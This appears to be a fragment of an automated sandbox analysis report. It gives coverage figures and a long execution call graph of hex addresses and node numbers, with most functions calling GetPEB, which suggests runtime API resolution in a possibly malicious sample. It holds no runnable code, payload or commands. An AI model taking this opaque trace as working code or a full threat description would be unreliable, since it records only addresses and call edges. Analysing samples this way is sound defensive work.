                                                                                                        Execution Coverage:3.6%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:1075
                                                                                                        Total number of Limit Nodes:6

                                                                                                        Graph

                                                                                                        execution_graph 4026 42dec27 4033 42df09e 4026->4033 4030 42df2ac 4031 42df2ae 4034 42ea566 GetPEB 4031->4034 4032 42ed617 GetPEB 4032->4033 4033->4030 4033->4031 4033->4032 4038 42e17cb 2 API calls 4033->4038 4039 42d2043 4033->4039 4045 42e3fae 4033->4045 4049 42df38a 4033->4049 4054 42e4d8d 4033->4054 4058 42ea2ab 4033->4058 4062 42e199d 4033->4062 4034->4030 4038->4033 4040 42d2059 4039->4040 4066 42e376b 4040->4066 4046 42e3fc7 4045->4046 4047 42d2309 GetPEB 4046->4047 4048 42e4063 4047->4048 4048->4033 4050 42e376b GetPEB 4049->4050 4051 42df406 4050->4051 4073 42d2985 4051->4073 4055 42e4dbb 4054->4055 4056 42d2309 GetPEB 4055->4056 4057 42e4e6f 4056->4057 4057->4033 4059 42ea2be 4058->4059 4060 42d2309 GetPEB 4059->4060 4061 42ea365 4060->4061 4061->4033 4063 42e19c9 4062->4063 4064 42d2309 GetPEB 4063->4064 4065 42e1a65 4064->4065 4065->4033 4067 42d2309 GetPEB 4066->4067 4068 42d2135 4067->4068 4069 42e42e4 4068->4069 4070 42e4307 4069->4070 4071 42d2309 GetPEB 4070->4071 4072 42d214b 4071->4072 4072->4033 4074 42d29a1 4073->4074 4075 42d2309 GetPEB 4074->4075 4076 42d2a36 4075->4076 4076->4033 5198 42d1956 5199 42d196c 5198->5199 5200 42d1ed4 GetPEB 5199->5200 5201 42d1a02 5200->5201 4077 42f32c3 4082 42e577e 4077->4082 4079 42f3355 4080 42d4248 2 API calls 4079->4080 4081 42f3369 4080->4081 4115 42e6ada 4082->4115 4083 42f2524 GetPEB 4083->4115 4084 42e6e5e 4084->4079 4091 42e73a8 4335 42f292b 4091->4335 4094 42dd10c GetPEB 4094->4115 4106 42e6e3c 4179 42df41f 4106->4179 4108 42d2043 GetPEB 4108->4115 4115->4083 4115->4084 4115->4091 4115->4094 4115->4106 4115->4108 4118 42f0352 GetPEB 4115->4118 4119 42d9384 4115->4119 4132 42e2fa2 4115->4132 4142 42ea8f0 4115->4142 4151 42edef4 4115->4151 4161 42e748a 4115->4161 4168 42ed99a 4115->4168 4190 42ebfe8 4115->4190 4202 42e78a5 4115->4202 4207 42e4e8a 4115->4207 4216 42e056a 4115->4216 4227 42d3845 4115->4227 4238 42d2a46 4115->4238 4248 42ea370 4115->4248 4252 42d43a2 4115->4252 4255 42f18d2 4115->4255 4259 42d55e8 4115->4259 4268 42d6b25 4115->4268 4280 42da3df 4115->4280 4293 42e399b 4115->4293 4296 42eece3 4115->4296 4304 42de21c 4115->4304 4311 42d1a0a 4115->4311 4315 42d6fc4 4115->4315 4321 42d2e17 4115->4321 4326 42d4af2 4115->4326 4331 42ef086 4115->4331 4118->4115 4129 42d987e 4119->4129 4120 42d9a11 4122 42d2043 GetPEB 4120->4122 4123 42d9a30 4122->4123 4125 42d2043 GetPEB 4123->4125 4128 42d9a0f 4125->4128 4126 42df38a GetPEB 4126->4129 4128->4115 4129->4120 4129->4126 4129->4128 4350 42d3f5c 4129->4350 4354 42e54fd 4129->4354 4358 42f0352 4129->4358 4362 42e7ad8 4129->4362 4366 42d2153 4129->4366 4136 42e2fdd 4132->4136 4133 42d5a31 GetPEB 4133->4136 4134 42e372a 4134->4115 4136->4133 4136->4134 4141 42d2043 GetPEB 4136->4141 4370 42f0b34 4136->4370 4380 42e0ade 4136->4380 4399 42dac95 4136->4399 4416 42e9da1 4136->4416 4425 42dd223 4136->4425 4141->4136 4148 42ea90a 4142->4148 4146 42eaaad 4146->4115 4147 42eaaaf 4149 42d2043 GetPEB 4147->4149 4148->4146 4148->4147 4150 42df38a GetPEB 4148->4150 4586 42e3ce1 4148->4586 4590 42ef14d 4148->4590 4600 42d89d8 4148->4600 4149->4146 4150->4148 4156 42ee1ed 4151->4156 4153 42d3035 GetPEB 4153->4156 4155 42df38a GetPEB 4155->4156 4156->4153 4156->4155 4157 42ee292 4156->4157 4160 42ee2a3 4156->4160 4704 42d9e22 4156->4704 4711 42f343c 4156->4711 4715 42efe9d 4156->4715 4159 42ed617 GetPEB 4157->4159 4159->4160 4160->4115 4165 42e7669 4161->4165 4162 42e76c6 4727 42e38ca 4162->4727 4163 42df38a GetPEB 4163->4165 4165->4162 4165->4163 4166 42e76c4 4165->4166 4723 42d42f7 4165->4723 4166->4115 4731 42d8934 4168->4731 4170 42edcc3 4172 42edcf2 4170->4172 4173 42d3f5c GetPEB 4170->4173 4175 42edd13 4170->4175 4177 42dab99 GetPEB 4170->4177 4178 42f0352 GetPEB 4170->4178 4748 42d419a 4170->4748 4751 42e0387 4170->4751 4734 42d4c00 4172->4734 4173->4170 4175->4115 4177->4170 4178->4170 4180 42df441 4179->4180 4181 42d3f5c GetPEB 4180->4181 4182 42d3035 GetPEB 4180->4182 4183 42df944 4180->4183 4185 42dfaec 4180->4185 4188 42f0352 GetPEB 4180->4188 4189 42e2f01 GetPEB 4180->4189 4759 42eeaac 4180->4759 4181->4180 4182->4180 4184 42ecaa8 2 API calls 4183->4184 4186 42df968 4184->4186 4185->4185 4186->4084 4188->4180 4189->4180 4201 42ec705 4190->4201 4191 42ef6d3 GetPEB 4191->4201 4192 42d3035 GetPEB 4192->4201 4193 42ec96e 4771 42e3d6e 4193->4771 4195 42d3f5c GetPEB 4195->4201 4197 42e2f01 GetPEB 4197->4201 4198 42ec96c 4198->4115 4200 42f0352 GetPEB 4200->4201 4201->4191 4201->4192 4201->4193 4201->4195 4201->4197 4201->4198 4201->4200 4763 42eceb9 4201->4763 4767 42ee35d 4201->4767 4205 42e79b1 4202->4205 4203 42e7a84 4203->4115 4205->4203 4775 42de0a2 4205->4775 4779 42e56bd 4205->4779 4211 42e50d9 4207->4211 4210 42efe9d GetPEB 4210->4211 4211->4210 4212 42e5133 4211->4212 4213 42f343c GetPEB 4211->4213 4214 42e5124 4211->4214 4783 42eabc8 4211->4783 4787 42ea1d9 4211->4787 4212->4115 4213->4211 4215 42f343c GetPEB 4214->4215 4215->4212 4219 42e08e2 4216->4219 4217 42e199d GetPEB 4217->4219 4218 42d3f5c GetPEB 4218->4219 4219->4217 4219->4218 4220 42dab99 GetPEB 4219->4220 4221 42e0ac2 4219->4221 4223 42e0ac0 4219->4223 4225 42f0352 GetPEB 4219->4225 4791 42eb0e5 4219->4791 4795 42f3370 4219->4795 4220->4219 4224 42ea566 GetPEB 4221->4224 4223->4115 4224->4223 4225->4219 4230 42d3ad9 4227->4230 4229 42d2043 GetPEB 4229->4230 4230->4229 4233 42f1988 GetPEB 4230->4233 4234 42d3c8c 4230->4234 4235 42d3b0f 4230->4235 4803 42e7d44 4230->4803 4807 42d9a57 4230->4807 4814 42e3c23 4230->4814 4233->4230 4234->4234 4799 42dabdf 4235->4799 4241 42d2d06 4238->4241 4239 42d4c00 GetPEB 4239->4241 4240 42d3f5c GetPEB 4240->4241 4241->4239 4241->4240 4242 42dab99 GetPEB 4241->4242 4243 42d2d2e 4241->4243 4244 42d2d48 4241->4244 4245 42ed617 GetPEB 4241->4245 4247 42f0352 GetPEB 4241->4247 4242->4241 4822 42eaeeb 4243->4822 4244->4115 4245->4241 4247->4241 4249 42ea38a 4248->4249 4250 42ea49b 4249->4250 4251 42f08d1 GetPEB 4249->4251 4250->4115 4251->4249 4253 42f18d2 GetPEB 4252->4253 4254 42d4417 4253->4254 4254->4115 4256 42f18eb 4255->4256 4257 42d2309 GetPEB 4256->4257 4258 42f197a 4257->4258 4258->4115 4266 42d583b 4259->4266 4260 42d58f1 4260->4115 4261 42d58f3 4840 42dc5fe 4261->4840 4262 42d3f5c GetPEB 4262->4266 4264 42e3fae GetPEB 4264->4266 4265 42dab99 GetPEB 4265->4266 4266->4260 4266->4261 4266->4262 4266->4264 4266->4265 4267 42f0352 GetPEB 4266->4267 4267->4266 4269 42d6b3f 4268->4269 4270 42d6fb7 4269->4270 4278 42df38a GetPEB 4269->4278 4864 42d3502 4269->4864 4872 42f1a3c 4269->4872 4893 42dc158 4269->4893 4904 42d3345 4269->4904 4911 42d8c09 4269->4911 4923 42e1c10 4269->4923 4931 42eb397 4269->4931 4943 42e1f6b 4269->4943 4270->4115 4278->4269 4291 42da933 4280->4291 4281 42dab74 4282 42f343c GetPEB 4281->4282 4284 42dab72 4282->4284 4283 42d3035 GetPEB 4283->4291 4284->4115 4285 42efe9d GetPEB 4285->4291 4287 42f343c GetPEB 4287->4291 4288 42d3f5c GetPEB 4288->4291 4290 42e2f01 GetPEB 4290->4291 4291->4281 4291->4283 4291->4284 4291->4285 4291->4287 4291->4288 4291->4290 4292 42f0352 GetPEB 4291->4292 5062 42eccd4 4291->5062 5066 42e90ba 4291->5066 4292->4291 4294 42df38a GetPEB 4293->4294 4295 42e3a17 4294->4295 4295->4115 4302 42eef44 4296->4302 4297 42f3370 GetPEB 4297->4302 4298 42ed617 GetPEB 4298->4302 4299 42e199d GetPEB 4299->4302 4301 42ef055 4301->4115 4302->4297 4302->4298 4302->4299 4302->4301 4303 42ea566 GetPEB 4302->4303 5091 42ed46d 4302->5091 4303->4302 4308 42de23f 4304->4308 4305 42de7c8 4307 42ebb18 GetPEB 4305->4307 4306 42df38a GetPEB 4306->4308 4309 42de7c6 4307->4309 4308->4305 4308->4306 4308->4309 4310 42ebb18 GetPEB 4308->4310 4309->4115 4310->4308 4312 42d1b88 4311->4312 4313 42d1c6f 4312->4313 4314 42d419a GetPEB 4312->4314 4313->4115 4314->4312 4319 42d7163 4315->4319 4318 42d7241 4318->4115 4319->4318 4320 42e3fae GetPEB 4319->4320 5095 42dbfb6 4319->5095 5103 42e3a85 4319->5103 4320->4319 4322 42d2ee6 4321->4322 4324 42df38a GetPEB 4322->4324 4325 42d2f2c 4322->4325 5136 42e5220 4322->5136 4324->4322 4325->4115 4327 42d8934 GetPEB 4326->4327 4328 42d4bbd 4327->4328 5169 42e73c3 4328->5169 4332 42ef099 4331->4332 4333 42d2309 GetPEB 4332->4333 4334 42ef142 4333->4334 4334->4115 4346 42f2cf0 4335->4346 4336 42d3f5c GetPEB 4336->4346 4337 42f2e45 4337->4084 4339 42dab99 GetPEB 4339->4346 4340 42e4e8a GetPEB 4340->4346 4341 42f2e47 4342 42e3fae GetPEB 4341->4342 4345 42f2e63 4342->4345 4344 42f0352 GetPEB 4344->4346 5190 42eeb42 4345->5190 4346->4336 4346->4337 4346->4339 4346->4340 4346->4341 4346->4344 4349 42d4c00 GetPEB 4346->4349 5173 42ee90e 4346->5173 5177 42d69a4 4346->5177 5181 42d4f8e 4346->5181 4349->4346 4351 42d3f73 4350->4351 4352 42df38a GetPEB 4351->4352 4353 42d4034 4352->4353 4353->4129 4353->4353 4355 42e551f 4354->4355 4356 42d2309 GetPEB 4355->4356 4357 42e55a9 4356->4357 4357->4129 4359 42f0365 4358->4359 4360 42d2043 GetPEB 4359->4360 4361 42f03ea 4360->4361 4361->4129 4363 42e7afb 4362->4363 4364 42d2309 GetPEB 4363->4364 4365 42e7b9d 4364->4365 4365->4129 4367 42d216c 4366->4367 4368 42d2309 GetPEB 4367->4368 4369 42d21fc 4368->4369 4369->4129 4374 42f0dda 4370->4374 4371 42d3f5c GetPEB 4371->4374 4373 42f2e95 GetPEB 4373->4374 4374->4371 4374->4373 4375 42df38a GetPEB 4374->4375 4376 42f0e1b 4374->4376 4377 42f0e2e 4374->4377 4379 42f0352 GetPEB 4374->4379 4437 42d2654 4374->4437 4375->4374 4378 42d2043 GetPEB 4376->4378 4377->4136 4377->4377 4378->4377 4379->4374 4393 42e13df 4380->4393 4381 42d3f5c GetPEB 4381->4393 4383 42f2e95 GetPEB 4383->4393 4385 42df38a GetPEB 4385->4393 4386 42e17a2 4391 42d2043 GetPEB 4386->4391 4387 42e160b 4388 42d5923 GetPEB 4387->4388 4392 42e1628 4388->4392 4390 42e1676 4390->4136 4394 42e17c2 4391->4394 4460 42e3a47 4392->4460 4393->4381 4393->4383 4393->4385 4393->4386 4393->4387 4393->4390 4396 42f0352 GetPEB 4393->4396 4448 42d5923 4393->4448 4452 42dbdcd 4393->4452 4456 42d1ed4 4393->4456 4396->4393 4398 42f0352 GetPEB 4398->4390 4400 42dacfe 4399->4400 4402 42dbdbd 4400->4402 4404 42dbd9e 4400->4404 4407 42d2043 GetPEB 4400->4407 4408 42d54da GetPEB 4400->4408 4410 42d3f5c GetPEB 4400->4410 4413 42f0352 GetPEB 4400->4413 4414 42d53f7 GetPEB 4400->4414 4468 42ef83f 4400->4468 4477 42df2cc 4400->4477 4481 42da2f6 4400->4481 4485 42f30fb 4400->4485 4489 42d8a5e 4400->4489 4493 42d40b0 4400->4493 4497 42ebc05 4400->4497 4402->4136 4500 42d54da 4404->4500 4407->4400 4408->4400 4410->4400 4413->4400 4414->4400 4417 42e9dca 4416->4417 4420 42ea1b5 4417->4420 4421 42df38a GetPEB 4417->4421 4423 42ea1b3 4417->4423 4424 42d1ed4 GetPEB 4417->4424 4512 42dfea0 4417->4512 4519 42f03f1 4417->4519 4422 42d2043 GetPEB 4420->4422 4421->4417 4422->4423 4423->4136 4424->4417 4436 42dd25b 4425->4436 4428 42d5ab2 GetPEB 4428->4436 4429 42d2043 GetPEB 4429->4436 4430 42df38a GetPEB 4430->4436 4432 42dd745 4435 42d2043 GetPEB 4432->4435 4433 42d1ed4 GetPEB 4433->4436 4434 42dd763 4434->4136 4435->4434 4436->4428 4436->4429 4436->4430 4436->4432 4436->4433 4436->4434 4564 42f1343 4436->4564 4571 42ed091 4436->4571 4578 42d1958 4436->4578 4438 42d2674 4437->4438 4440 42d294a 4438->4440 4442 42df38a GetPEB 4438->4442 4443 42d2948 4438->4443 4444 42ea71e 4438->4444 4441 42ea71e GetPEB 4440->4441 4441->4443 4442->4438 4443->4374 4445 42ea746 4444->4445 4446 42d2309 GetPEB 4445->4446 4447 42ea7f2 4446->4447 4447->4438 4449 42d593d 4448->4449 4450 42df38a GetPEB 4449->4450 4451 42d59c6 4450->4451 4451->4393 4453 42dbdef 4452->4453 4454 42f2e95 GetPEB 4453->4454 4455 42dbe11 4454->4455 4455->4393 4457 42d1eee 4456->4457 4464 42d2451 4457->4464 4461 42e3a63 4460->4461 4462 42f2e95 GetPEB 4461->4462 4463 42e1659 4462->4463 4463->4398 4465 42d246d 4464->4465 4466 42d2309 GetPEB 4465->4466 4467 42d1f6f 4466->4467 4467->4393 4474 42efb14 4468->4474 4469 42efc20 4471 42efc28 4469->4471 4472 42d2043 GetPEB 4469->4472 4471->4400 4472->4471 4473 42df38a GetPEB 4473->4474 4474->4469 4474->4473 4475 42d1ed4 GetPEB 4474->4475 4476 42d2043 GetPEB 4474->4476 4504 42f1027 4474->4504 4475->4474 4476->4474 4478 42df2ec 4477->4478 4479 42d2309 GetPEB 4478->4479 4480 42df379 4479->4480 4480->4400 4482 42da31f 4481->4482 4483 42d2309 GetPEB 4482->4483 4484 42da3c9 4483->4484 4484->4400 4486 42f3130 4485->4486 4487 42d2309 GetPEB 4486->4487 4488 42f31b9 4487->4488 4488->4400 4490 42d8a93 4489->4490 4491 42d2309 GetPEB 4490->4491 4492 42d8b29 4491->4492 4492->4400 4494 42d40d2 4493->4494 4495 42d2309 GetPEB 4494->4495 4496 42d4187 4495->4496 4496->4400 4508 42e2e3d 4497->4508 4501 42d54f0 4500->4501 4502 42d2309 GetPEB 4501->4502 4503 42d55a3 4502->4503 4503->4402 4505 42f1049 4504->4505 4506 42d2309 GetPEB 4505->4506 4507 42f10dc 4506->4507 4507->4474 4509 42e2e5e 4508->4509 4510 42d2309 GetPEB 4509->4510 4511 42e2eea 4510->4511 4511->4400 4513 42dfec5 4512->4513 4514 42df38a GetPEB 4513->4514 4515 42e0247 4513->4515 4516 42ec9a0 GetPEB 4513->4516 4517 42e025f 4513->4517 4514->4513 4518 42d2043 GetPEB 4515->4518 4516->4513 4517->4417 4518->4517 4521 42f040e 4519->4521 4522 42f067d 4521->4522 4524 42d5ab2 4521->4524 4540 42d87a8 4521->4540 4522->4417 4525 42d5ae1 4524->4525 4527 42d3f5c GetPEB 4525->4527 4528 42d2043 GetPEB 4525->4528 4530 42d67a3 4525->4530 4532 42d68da 4525->4532 4537 42e54fd GetPEB 4525->4537 4538 42df38a GetPEB 4525->4538 4539 42f0352 GetPEB 4525->4539 4544 42e18c8 4525->4544 4548 42e55bd 4525->4548 4552 42f002c 4525->4552 4556 42e3802 4525->4556 4560 42e3b54 4525->4560 4527->4525 4528->4525 4533 42d2153 GetPEB 4530->4533 4532->4532 4536 42d67cb 4533->4536 4536->4521 4537->4525 4538->4525 4539->4525 4541 42d87dd 4540->4541 4542 42d2309 GetPEB 4541->4542 4543 42d8860 4542->4543 4543->4521 4545 42e18d8 4544->4545 4546 42d2309 GetPEB 4545->4546 4547 42e1991 4546->4547 4547->4525 4549 42e55ed 4548->4549 4550 42d2309 GetPEB 4549->4550 4551 42e56a5 4550->4551 4551->4525 4553 42f0051 4552->4553 4554 42d2309 GetPEB 4553->4554 4555 42f00f1 4554->4555 4555->4525 4557 42e381e 4556->4557 4558 42d2309 GetPEB 4557->4558 4559 42e38b5 4558->4559 4559->4525 4561 42e3b87 4560->4561 4562 42d2309 GetPEB 4561->4562 4563 42e3c07 4562->4563 4563->4525 4568 42f1365 4564->4568 4565 42f188a 4566 42d2043 GetPEB 4565->4566 4567 42f1888 4566->4567 4567->4436 4568->4565 4568->4567 4569 42de7fe GetPEB 4568->4569 4570 42df38a GetPEB 4568->4570 4569->4568 4570->4568 4573 42ed0bd 4571->4573 4572 42df38a GetPEB 4572->4573 4573->4572 4574 42ed43b 4573->4574 4576 42ed43d 4573->4576 4582 42ebb18 4573->4582 4574->4436 4577 42ebb18 GetPEB 4576->4577 4577->4574 4579 42d196c 4578->4579 4580 42d1ed4 GetPEB 4579->4580 4581 42d1a02 4580->4581 4581->4436 4583 42ebb35 4582->4583 4584 42d1ed4 GetPEB 4583->4584 4585 42ebbd7 4584->4585 4585->4573 4587 42e3d4f 4586->4587 4588 42e3d69 4586->4588 4587->4588 4589 42d2043 GetPEB 4587->4589 4588->4148 4589->4587 4597 42ef416 4590->4597 4591 42ef5ea 4591->4148 4592 42d3f5c GetPEB 4592->4597 4595 42ef5d5 4596 42d2043 GetPEB 4595->4596 4596->4591 4597->4591 4597->4592 4597->4595 4598 42f0352 GetPEB 4597->4598 4599 42df38a GetPEB 4597->4599 4604 42dd10c 4597->4604 4608 42e2f01 4597->4608 4598->4597 4599->4597 4601 42d89eb 4600->4601 4612 42e3e1f 4601->4612 4605 42dd12d 4604->4605 4606 42df38a GetPEB 4605->4606 4607 42dd1d5 4606->4607 4607->4597 4609 42e2f2c 4608->4609 4610 42f2e95 GetPEB 4609->4610 4611 42e2f4e 4610->4611 4611->4597 4620 42e3e39 4612->4620 4613 42df38a GetPEB 4613->4620 4616 42e3f28 4619 42d2043 GetPEB 4616->4619 4617 42d8a57 4617->4148 4619->4617 4620->4613 4620->4616 4620->4617 4621 42e44aa 4620->4621 4630 42e7ed1 4620->4630 4648 42deb41 4620->4648 4624 42e49f3 4621->4624 4622 42d3f5c GetPEB 4622->4624 4623 42e4b7e 4625 42d2153 GetPEB 4623->4625 4624->4622 4624->4623 4627 42e4b7c 4624->4627 4628 42f0352 GetPEB 4624->4628 4629 42e54fd GetPEB 4624->4629 4653 42e77bd 4624->4653 4625->4627 4627->4620 4628->4624 4629->4624 4647 42e8be7 4630->4647 4631 42d3f5c GetPEB 4631->4647 4634 42e90b5 4634->4634 4636 42e8f42 4639 42d2153 GetPEB 4636->4639 4638 42d1f77 GetPEB 4638->4647 4641 42e8f67 4639->4641 4640 42e77bd GetPEB 4640->4647 4641->4620 4642 42d1ed4 GetPEB 4642->4647 4645 42e54fd GetPEB 4645->4647 4646 42f0352 GetPEB 4646->4647 4647->4631 4647->4634 4647->4636 4647->4638 4647->4640 4647->4642 4647->4645 4647->4646 4657 42f3044 4647->4657 4661 42eec19 4647->4661 4665 42ecdff 4647->4665 4669 42d220a 4647->4669 4673 42d8b42 4647->4673 4677 42d758f 4647->4677 4649 42ecdff GetPEB 4648->4649 4650 42dec09 4649->4650 4651 42d2043 GetPEB 4650->4651 4652 42dec20 4651->4652 4652->4620 4654 42e77f0 4653->4654 4655 42d2309 GetPEB 4654->4655 4656 42e7889 4655->4656 4656->4624 4658 42f305d 4657->4658 4659 42d2309 GetPEB 4658->4659 4660 42f30ed 4659->4660 4660->4647 4662 42eec38 4661->4662 4663 42d2309 GetPEB 4662->4663 4664 42eeccf 4663->4664 4664->4647 4666 42ece12 4665->4666 4667 42d2309 GetPEB 4666->4667 4668 42ecead 4667->4668 4668->4647 4670 42d2242 4669->4670 4671 42d2309 GetPEB 4670->4671 4672 42d22ee 4671->4672 4672->4647 4674 42d8b67 4673->4674 4675 42d2309 GetPEB 4674->4675 4676 42d8bf6 4675->4676 4676->4647 4685 42d82fc 4677->4685 4678 42df38a GetPEB 4678->4685 4679 42d2043 GetPEB 4679->4685 4681 42d879a 4681->4681 4682 42d833d 4683 42d2153 GetPEB 4682->4683 4687 42d8362 4683->4687 4684 42d3f5c GetPEB 4684->4685 4685->4678 4685->4679 4685->4681 4685->4682 4685->4684 4686 42e55bd GetPEB 4685->4686 4688 42e54fd GetPEB 4685->4688 4690 42f0352 GetPEB 4685->4690 4692 42ef6d3 4685->4692 4696 42dd9c6 4685->4696 4700 42f0a43 4685->4700 4686->4685 4687->4647 4688->4685 4690->4685 4693 42ef6e6 4692->4693 4694 42d2309 GetPEB 4693->4694 4695 42ef784 4694->4695 4695->4685 4697 42dd9fd 4696->4697 4698 42d2309 GetPEB 4697->4698 4699 42dda92 4698->4699 4699->4685 4701 42f0a7b 4700->4701 4702 42d2309 GetPEB 4701->4702 4703 42f0b13 4702->4703 4703->4685 4708 42d9f63 4704->4708 4705 42ed617 GetPEB 4705->4708 4706 42da019 4719 42de9c7 4706->4719 4708->4705 4708->4706 4709 42da017 4708->4709 4710 42ef6d3 GetPEB 4708->4710 4709->4156 4710->4708 4712 42f344f 4711->4712 4713 42d2309 GetPEB 4712->4713 4714 42f34e4 4713->4714 4714->4156 4716 42efeb7 4715->4716 4717 42d2309 GetPEB 4716->4717 4718 42eff44 4717->4718 4718->4156 4720 42de9e0 4719->4720 4721 42d2309 GetPEB 4720->4721 4722 42dea63 4721->4722 4722->4709 4724 42d4315 4723->4724 4725 42d2309 GetPEB 4724->4725 4726 42d4394 4725->4726 4726->4165 4728 42e38f2 4727->4728 4729 42d2309 GetPEB 4728->4729 4730 42e3987 4729->4730 4730->4166 4732 42d2309 GetPEB 4731->4732 4733 42d89cf 4732->4733 4733->4170 4735 42d4c1a 4734->4735 4736 42d5a31 GetPEB 4735->4736 4737 42d4edf 4736->4737 4738 42d5a31 GetPEB 4737->4738 4739 42d4efa 4738->4739 4740 42d5a31 GetPEB 4739->4740 4741 42d4f10 4740->4741 4742 42de9c7 GetPEB 4741->4742 4743 42d4f2b 4742->4743 4744 42de9c7 GetPEB 4743->4744 4745 42d4f49 4744->4745 4755 42e7bb2 4745->4755 4749 42d2309 GetPEB 4748->4749 4750 42d423f 4749->4750 4750->4170 4752 42e03ac 4751->4752 4753 42f2e95 GetPEB 4752->4753 4754 42e03c9 4753->4754 4754->4170 4756 42e7bc8 4755->4756 4757 42d2309 GetPEB 4756->4757 4758 42d4f81 4757->4758 4758->4175 4760 42eeae9 4759->4760 4761 42f2e95 GetPEB 4760->4761 4762 42eeb0c 4761->4762 4762->4180 4764 42ecef4 4763->4764 4765 42d2309 GetPEB 4764->4765 4766 42ecf9d 4765->4766 4766->4201 4768 42ee38a 4767->4768 4769 42d2309 GetPEB 4768->4769 4770 42ee428 4769->4770 4770->4201 4772 42e3d84 4771->4772 4773 42d2309 GetPEB 4772->4773 4774 42e3e14 4773->4774 4774->4198 4776 42de0bb 4775->4776 4777 42d2309 GetPEB 4776->4777 4778 42de164 4777->4778 4778->4205 4780 42e56d3 4779->4780 4781 42d2309 GetPEB 4780->4781 4782 42e5773 4781->4782 4782->4205 4784 42eabde 4783->4784 4785 42d2309 GetPEB 4784->4785 4786 42eac8f 4785->4786 4786->4211 4788 42ea1f5 4787->4788 4789 42d2309 GetPEB 4788->4789 4790 42ea299 4789->4790 4790->4211 4792 42eb102 4791->4792 4793 42d2309 GetPEB 4792->4793 4794 42eb1a2 4793->4794 4794->4219 4796 42f3383 4795->4796 4797 42d2309 GetPEB 4796->4797 4798 42f3431 4797->4798 4798->4219 4800 42dabf2 4799->4800 4801 42d2309 GetPEB 4800->4801 4802 42d3b21 4801->4802 4802->4115 4804 42e7d5d 4803->4804 4805 42d2309 GetPEB 4804->4805 4806 42e7dfa 4805->4806 4806->4230 4808 42d9a76 4807->4808 4809 42d9d6f 4808->4809 4810 42df38a GetPEB 4808->4810 4812 42d9d6d 4808->4812 4818 42f0f49 4808->4818 4811 42f0f49 GetPEB 4809->4811 4810->4808 4811->4812 4812->4230 4815 42e3c40 4814->4815 4816 42d2309 GetPEB 4815->4816 4817 42e3cd2 4816->4817 4817->4230 4819 42f0f76 4818->4819 4820 42d2309 GetPEB 4819->4820 4821 42f100e 4820->4821 4821->4808 4823 42eaf05 4822->4823 4824 42d3f5c GetPEB 4823->4824 4825 42eb095 4824->4825 4832 42d2411 4825->4832 4828 42f0352 GetPEB 4829 42eb0c5 4828->4829 4836 42ef790 4829->4836 4833 42d2430 4832->4833 4834 42f2e95 GetPEB 4833->4834 4835 42d2449 4834->4835 4835->4828 4837 42ef7a6 4836->4837 4838 42d2309 GetPEB 4837->4838 4839 42eb0dd 4838->4839 4839->4244 4847 42dc624 4840->4847 4842 42dcc75 4860 42dfbfa 4842->4860 4844 42dcc73 4844->4260 4846 42d3f5c GetPEB 4846->4847 4847->4842 4847->4844 4847->4846 4848 42d2411 GetPEB 4847->4848 4849 42dab99 GetPEB 4847->4849 4850 42f0352 GetPEB 4847->4850 4851 42dc5fe GetPEB 4847->4851 4852 42ee9e8 4847->4852 4856 42e1a80 4847->4856 4848->4847 4849->4847 4850->4847 4851->4847 4853 42eea04 4852->4853 4854 42d2309 GetPEB 4853->4854 4855 42eea9e 4854->4855 4855->4847 4857 42e1a9d 4856->4857 4858 42d2309 GetPEB 4857->4858 4859 42e1b45 4858->4859 4859->4847 4861 42dfc0d 4860->4861 4862 42d2309 GetPEB 4861->4862 4863 42dfcbd 4862->4863 4863->4844 4870 42d3739 4864->4870 4866 42d377a 4866->4269 4867 42d376a 4964 42ddfd3 4867->4964 4868 42e38ca GetPEB 4868->4870 4870->4866 4870->4867 4870->4868 4968 42e98bd 4870->4968 4976 42f0687 4870->4976 4873 42f2220 4872->4873 4875 42f24b4 4873->4875 4877 42ed617 GetPEB 4873->4877 4880 42ea566 GetPEB 4873->4880 4883 42e3fae GetPEB 4873->4883 4885 42d4af2 GetPEB 4873->4885 4887 42f24b2 4873->4887 4889 42d3f5c GetPEB 4873->4889 4890 42dab99 GetPEB 4873->4890 4891 42f0352 GetPEB 4873->4891 4993 42ee867 4873->4993 4996 42f01ed 4873->4996 5000 42f25c3 4873->5000 5007 42da048 4873->5007 5015 42ddaae 4873->5015 4876 42ecaa8 2 API calls 4875->4876 4879 42f24e1 4876->4879 4877->4873 4882 42ea566 GetPEB 4879->4882 4879->4887 4880->4873 4884 42f24ff 4882->4884 4883->4873 4886 42ea566 GetPEB 4884->4886 4885->4873 4886->4887 4887->4269 4889->4873 4890->4873 4891->4873 4900 42dc4c4 4893->4900 4894 42ecaa8 2 API calls 4894->4900 4895 42dc5f4 4895->4269 4896 42ed617 GetPEB 4896->4900 4897 42e3fae GetPEB 4897->4900 4898 42f01ed GetPEB 4898->4900 4899 42d3f5c GetPEB 4899->4900 4900->4894 4900->4895 4900->4896 4900->4897 4900->4898 4900->4899 4901 42dab99 GetPEB 4900->4901 4902 42f0352 GetPEB 4900->4902 4903 42f25c3 GetPEB 4900->4903 4901->4900 4902->4900 4903->4900 4908 42d3490 4904->4908 4905 42d34f6 4905->4269 4906 42d2043 GetPEB 4906->4908 4907 42f18d2 GetPEB 4907->4908 4908->4905 4908->4906 4908->4907 4909 42ddfd3 GetPEB 4908->4909 4910 42ea566 GetPEB 4908->4910 4909->4908 4910->4908 4922 42d919a 4911->4922 4912 42d3035 GetPEB 4912->4922 4913 42d9379 4913->4269 4914 42ed617 GetPEB 4914->4922 4915 42d3f5c GetPEB 4915->4922 4916 42e3fae GetPEB 4916->4922 4917 42f01ed GetPEB 4917->4922 4918 42ecaa8 2 API calls 4918->4922 4919 42dab99 GetPEB 4919->4922 4920 42f0352 GetPEB 4920->4922 4921 42f25c3 GetPEB 4921->4922 4922->4912 4922->4913 4922->4914 4922->4915 4922->4916 4922->4917 4922->4918 4922->4919 4922->4920 4922->4921 4924 42e1e5f 4923->4924 4925 42e1ea0 4924->4925 4926 42e98bd GetPEB 4924->4926 4927 42e38ca GetPEB 4924->4927 4928 42e1e90 4924->4928 4930 42f0687 GetPEB 4924->4930 4925->4269 4926->4924 4927->4924 4929 42ddfd3 GetPEB 4928->4929 4929->4925 4930->4924 4935 42eb931 4931->4935 4932 42d3035 GetPEB 4932->4935 4933 42ebb0d 4933->4269 4934 42ed617 GetPEB 4934->4935 4935->4932 4935->4933 4935->4934 4936 42e3fae GetPEB 4935->4936 4937 42f01ed GetPEB 4935->4937 4938 42f0352 GetPEB 4935->4938 4939 42d3f5c GetPEB 4935->4939 4940 42ecaa8 2 API calls 4935->4940 4941 42dab99 GetPEB 4935->4941 4942 42f25c3 GetPEB 4935->4942 